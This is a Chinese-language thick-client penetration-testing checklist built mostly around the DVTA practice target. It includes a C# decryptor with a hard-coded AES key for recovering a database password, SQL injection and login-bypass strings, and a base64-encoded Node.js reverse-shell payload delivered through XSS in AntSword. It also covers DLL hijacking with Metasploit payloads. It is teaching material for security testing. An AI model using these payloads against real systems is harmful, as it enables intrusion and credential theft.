PC客户端（CS架构）客户端渗透测试指南

0x00前言

本项目主要针对PC客户端（CS架构）渗透测试，结合自身测试经验和网络资料形成清单，如有任何问题，欢迎联系，期待大家贡献更多的技巧和案例。

0x01概述

PC客户端，有丰富功能的图形用户界面，CS架构。

0x02开发语言

C＃（.NET），JAVA，DELPHI，C，C ++ ......

0x03协议

TCP，HTTP（S），TDS ......

0x04数据库

Oracle，MSSQL，DB2 ......

0x05测试工具

//相关工具下载：https://github.com/theLSA/hack-cs-tools

dvta： pc客户端靶场

ida pro： 静态分析工具

ollydbg：动态分析工具

CFF Explorer：PE文件分析

PEID：查壳工具

exeinfope/studype：pe文件分析

wireshark：观察流量

tcpview：观察tcp流量

echo Mirage：可拦截tcp流量

burpsuite：http(s)抓包

proxifier：全局代理流量

procmon：文件和注册表监控

regshot：注册表变化对比

process Hacker：进程分析

RegfromApp：注册表监控

WSExplorer：岁月联盟进程抓包工具

strings：查看程序的字符串

.net[反]编译：

dotpeek

de4dot

dnspy

ilspy

sae

ildasm

ilasm

Java反编译

jad

jd-gui

jadx

dex2jar

在线版： javare.cn

www.javadecompilers.com

Reflexil：组装编辑器（可以作为ilspy插件）

Vcg：自动化代码审计工具

BinScope：二进制分析工具

0x06代理设置

大部分客户端没有代理配置功能，需要自行设置全局代理，如下两种方法：

1）IE-互联网设置 - 连接 - 局域网设置。

2）代理服务器/代理服务器规则

// http的流量可以结合burpsuite方便测试（代理服务器设置为burp代理地址）。

0x07测试点

0.1 信息收集

编译信息，开发环境/语言，使用协议，数据库，IP，混淆/加密，是否加壳等。

案例0-CFF查看客户端信息（如编译环境）

dvta

1. 逆向工程

反编译，源代码泄露，硬编码密钥/密码，加解密逻辑，角色判断逻辑（0-admin，1- normaluser），后门等。

案例0-反编译获取加解密逻辑并编写解密工具

dvta

通过该逻辑和获取的信息

加密的文本： CTsvjZ0jQghXYWbSRcPxpQ ==

AES密钥： J8gLXc454o5tW2HEF7HahcXPufj9v8k8

IV： fq20T0gMnXa6g0l4

编写解密工具

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Security.Cryptography;

namespace aesdecrypt

{

public partial class aesdecrypt : Form

{

public aesdecrypt()

{

InitializeComponent();

}

private void decrypt(object sender, EventArgs e)

{

String key = “J8gLXc454o5tW2HEF7HahcXPufj9v8k8”;

String IV = “fq20T0gMnXa6g0l4”;

String encryptedtext = “CTsvjZ0jQghXYWbSRcPxpQ==”;

byte[] encryptedBytes = Convert.FromBase64String(encryptedtext);

AesCryptoServiceProvider aes = new AesCryptoServiceProvider();

aes.BlockSize = 128;

aes.KeySize = 256;

aes.Key = System.Text.ASCIIEncoding.ASCII.GetBytes(key);

aes.IV = System.Text.ASCIIEncoding.ASCII.GetBytes(IV);

aes.Padding = PaddingMode.PKCS7;

aes.Mode = CipherMode.CBC;

ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV);

byte[] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length);

String decryptedString = System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes);

Console.WriteLine(“\n”);

Console.WriteLine(“##########Decryptig Database password##########\n”);

Console.WriteLine(“Decrypted Database password:” + decryptedString+”\n”);

Console.WriteLine(“##########Done##########\n”);

}

}

}

案例1-反编译修改代码逻辑让普通用户以管理员登录

dvta

1-Isadmin

0 Normaluser

改1为0即可判断为管理

2. 信息泄露

明文敏感信息，敏感文件（如安装目录下的xxx.config）。

注册表：利用regshot比较客户端运行（如登录）前后注册表差别。

开发调试日志记录（如dvta.exe >> log.txt）

process hacker查看客户端内存中的明文敏感数据（如账号密码/密钥）。

strings直接查看客户端字符串（如IP信息）。

查看源代码（如github上，gitee等）

案例0-配置敏感信息泄露

dvta

案例1-内存泄露数据库账号密码

dvta

案例2-源代码含有硬编码的ftp账号密码

dvta

案例3-开发调试日志泄露

dvta

案例4-某系统登录后本地保存账号密码

//案例本。来源于https://blog.csdn.net/weixin_30685047/article/details/95916065

3. 传输流量

Wireshark / echo Mirage / burpsuite + nopeproxy / filler / charles

FTP等协议明文传输的账号密码

SQL语句明文传输（如利用构造注入，越权等）

案例0-正方教务系统的SQL语句明文传输，返回明文数据

//本案例来源于wooyun

4. 其他漏洞

爆破

如登录功能。

用户名枚举

案例0

SQL语句暴露

案例0

SQL注入

如登录处，万能密码

xxx’ or ‘x’=’x

xxx’ or 1=1--

输入框处，构造闭合报错，如’、’)、%’)、order by 100--等。

利用显示位或报错注出数据，原理同web注入，不同数据库大同小异。

案例0-oracle的注入

' union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--

案例1-MSSQL注入

111') and (select user)>0--

CSV注入

如导出excel，输入1+1，导出后看是否为2。

弱口令

可尝试admin 123456等。

XSS

如Electron，NodeWebKit等。

案例0-中国蚁剑xss到rce

环境：win7+phpstudy(php5.6.27-nts)+perl+nc+antsword2.0.5

xss webshell：

<?php
header('HTTP/1.1 500 <img src=# onerror=alertx>');

WIN +的node.js：

成功

var net = require("net"), sh = require("child_process").exec("cmd.exe");

var client = new net.Socket();

client.connect(6677, "127.0.0.1", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);

sh.stderr.pipe(client);});

<?php

header("HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVjdCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs = ,BASE64).toString())'>");

?>

相关参考

https://www.anquanke.com/post/id/176379

命令执行

案例0-印象笔记窗口客户端6.15本地文件读取和远程命令执行

http://blog.knownsec.com/2018/11/%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AE%B0-windows-%E5%AE%A2%E6% 88％AB B7％E7％％AF-6-15-％E6％9C％AC％E5％9C％B0％E6％96％87％E4％BB％B6％E8％AF％BB％E5％8F％96 ％E5％92％8C％E8％BF％9C％E7％A8％8B％E5％91％BD％E4％BB％A4％E6％89％A7％E8％A1％8C /

案例1某云PC客户端命令执行挖掘过程

https://www.secpulse.com/archives/53852.html

案例2-金山WPS邮件邮件客户端远程命令执行漏洞（Mozilla系XUL程序利用技巧）

https://shuimugan.com/bug/view?bug_no=193117

逻辑缺陷

测试点同网络。

密码明文传输

DLL劫持

Linux文件搜索顺序：

1. 当前目录
2. PATH顺序值目录

程序搜索Dll顺序：

//没提供绝对路径

1.应用程序加载的目录。

2.当前目录。

3.系统目录 (C:\Windows\System32\)。

4.16位的系统目录。

5.Windows目录。

6.PATH变量的目录。

程序可以加载攻击者放置的恶意dll。

利用procmon搜索程序加载的dll，观察name not found。

msf生成恶意dll放置于程序加载位置，运行程序即可触发payload。

案例0-DLL劫持

dvta

授权认证缺陷

注册表键值，授权服务器返回信息构造。

相关参考

https://cloud.tencent.com/developer/article/1430899

越权

未授权

案例0-正方教务系统数据库任意操作

知道IP即可接管数据库

//本案例来源于wooyun

溢出

0x08相关技巧

1.wireshark直接过滤出服务器或数据库的IP或协议方便查看，如

ip.addr == 1.2.3.4 && http

2.如果有数据库账号，可以用数据库监控sql语句操作（如sql server profiler）。

0x09参考资料和＆相关资源

https://resources.infosecinstitute.com

PDF下载地址：

https://github.com/theLSA/CS-checklist/blob/master/CS-checklist.pdf

相关工具的下载地址：

https://github.com/theLSA/hack-cs-tools

参考来源：Github

作者：theLSA

原文地址见点击阅读原文

如有侵权，请联系删除